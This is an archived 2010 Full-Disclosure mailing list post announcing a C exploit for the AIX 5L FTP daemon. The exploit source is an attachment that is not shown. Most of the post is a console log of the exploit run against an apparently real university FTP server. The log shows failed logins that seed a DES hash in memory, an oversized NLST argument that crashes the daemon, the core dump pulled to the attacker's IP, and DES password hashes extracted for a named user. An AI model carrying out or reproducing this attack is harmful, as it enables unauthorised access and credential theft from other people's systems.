| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 23 Jul 2010 05:27:03 +0200 From: "HI-TECH ." <isowarez.isowarez.isowarez@...glemail.com> To: full-disclosure@...ts.grok.org.uk Subject: Advanced AIX 5l FTPd Exploit Attached is another version of my AIX 5l FTPd exploit written in C to be more portable & powerful between hosts :> The Exploit in action: [root@...067037 kcope]# ./aix -h ftp.ABABABABABA.edu -i 85.25.67.37 -c jkateley < 220 yuma FTP server (Version 4.1 Wed Mar 2 15:52:50 CST 2005) ready. populating DES hash in memory... > USER jkateley < 331 Password required for jkateley. > PASS abcdef < 530 Login incorrect. > USER jkateley < 331 Password required for jkateley. > PASS abcdef < 530 Login incorrect. > USER jkateley < 331 Password required for jkateley. > PASS abcdef < 530 Login incorrect. logging in... > USER ftp < 331 Guest login ok, send ident as password. > PASS guest < 230-Last unsuccessful login: Thu Jul 22 09:41:21 MDT 2010 on ssh from docsis1-137 230-Last login: Thu Jul 22 21:12:23 MDT 2010 on ftp from vs2067037.vserver.de < 230 Guest login ok, access restrictions apply. changing directory... > CWD pub < 250 CWD command successful. triggering segmentation violation... > NLST ~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA trigger succeeded! < 220 yuma FTP server (Version 4.1 Wed Mar 2 15:52:50 CST 2005) ready. logging in 2nd time... > USER ftp < 331 Guest login ok, send ident as password. > PASS guest < 230-Last unsuccessful login: Thu Jul 22 09:41:21 MDT 2010 on ssh from docsis1-137 230-Last login: Thu Jul 22 21:12:33 MDT 2010 on ftp from vs2067037.vserver.de < 230 Guest login ok, access restrictions apply. changing directory... > CWD pub < 250 CWD command successful. getting core file... > TYPE I < 200 Type set to I. > PORT 85,25,67,37,98,23 < 200 PORT command successful. > RETR core < 150 Opening data connection for core (3979727 bytes). finally extracting DES hashes from core file for user 'jkateley'... PbdsrHgkIuvp2 9aS4EOARuLSqA PbdsrHgkIuvp2 logininterval loginreenable 9aS4EOARuLSqA logininterval loginreenable YIELDLOOPTIME YIELDLOOPTIME YIELDLOOPTIME YIELDLOOPTIME MALLOCBUCKETS PREREQUISITES logininterval loginreenable loginreenable logininterval done. [root@...067037 kcope]# Content of type "text/html" skipped Download attachment "aix.c" of type "application/octet-stream" (7713 bytes) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists